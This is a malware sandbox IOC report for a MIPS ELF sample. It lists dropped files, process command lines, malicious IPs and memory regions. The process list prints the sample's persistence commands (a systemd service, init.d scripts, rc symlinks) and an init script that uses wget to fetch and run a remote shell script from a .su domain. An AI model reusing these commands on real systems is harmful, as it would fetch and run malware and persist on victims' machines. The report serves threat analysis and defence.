IOC Report
mips.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
mips.nn.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/mips.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.XqNobR (deleted)
ASCII text, with no line terminators
dropped
/tmp/qemu-open.c2m2lS (deleted)
ASCII text
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/mips.nn.elf
/tmp/mips.nn.elf
/tmp/mips.nn.elf
-
/tmp/mips.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/mips.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/mips.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/mips.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
/tmp/mips.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mips.nn.elf
/tmp/mips.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/mips.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
/tmp/mips.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 24 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
154.216.17.220
unknown
Seychelles
malicious
91.92.246.113
unknown
Bulgaria
malicious
93.123.85.166
unknown
Bulgaria
malicious
45.202.35.64
unknown
Seychelles

Memdumps

Base Address
Regiontype
Protect
Malicious
7f4a18419000
page execute read
 malicious
7f4a9c977000
page read and write
7f4a9d43d000
page read and write
55c523d22000
page execute and read and write
7f4a9d7de000
page read and write
7f4a9d801000
page read and write
55c5259c7000
page read and write
7f4a9de61000
page read and write
7f4a98021000
page read and write
7f4a9d17f000
page read and write
7ffff29e9000
page read and write
7ffff29ed000
page execute read
55c521d1a000
page read and write
7f4a9d18d000
page read and write
55c521a92000
page execute read
7f4a9d81e000
page read and write
55c523d39000
page read and write
7f4a9dd30000
page read and write
7f4a9dea6000
page read and write
55c521d24000
page read and write
7f4a98000000
page read and write
7f4a18459000
page read and write
7f4a9db4f000
page read and write
7f4a9de59000
page read and write
7f4a1845d000
page read and write
There are 15 hidden memdumps, click here to show them.